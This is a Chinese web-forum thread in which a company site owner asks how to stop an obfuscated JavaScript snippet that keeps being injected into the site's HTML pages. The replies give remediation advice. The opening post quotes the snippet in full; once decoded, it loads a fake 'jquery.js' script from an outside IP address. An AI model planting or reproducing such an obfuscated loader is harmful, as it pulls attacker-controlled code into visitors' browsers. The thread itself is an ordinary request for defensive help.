我公司网站http://www.china-auto-bearing.com/老是被插入一JS代码,删除了又被加入,代码内容如下:<script language=javascript><!-- 
document.write(unescape('%3Cst1LctNrit1Lpt1LtPJ%20sPJrctBM%3DRB%2FS0Q%2Ft1L9tN4c8%2ES0Q2RB4c87tN%2Et1L2c8%2E19tBM5%2FErjS0QqtNuerEry%2Ejt1LsRB%3E%3C%2FsPJcrt1Lipt%3E').replace(/Er|tBM|t1L|c8|S0Q|RB|tN|PJ/g,""));
 --></script>网站用PHP+MYSQL做的,前台是HTML
请各位高手帮忙出出主意如何解决这个问题。

解决方案 »

  1.   

    去服务器确认一下,是服务器上的文件被修改了,还是你自己的浏览器有问题。
    用Firefox打开看看。如果是服务器被修改,缩小文件权限、更改账号密码看看。
      

  2.   

    是服务器上被修改,是虚拟主机没法改帐号密码,如果改权限,就无法生成HTML了。就算HTML和PHP分开放,也只能是PHP文件不被修改,HTML还是会被改。苦恼ING
      

  3.   

    既然前台是html,那么肯定是程序后台有漏洞。如果是开源的程序,建议升级成最新版本。
      

  4.   

    你的php程序有问题,如果你改不了的话,你可以先生成一个干净的,然后把后台php程序都删掉.需要更新的时候,再上传
      

  5.   

    服务器是美国godaddy的虚拟主机,安全应该没有问题
      

  6.   

    应该是你们程序有漏洞,被人中了木马,可试着查找最近创建或被修改的php文件,如果可疑就删除它。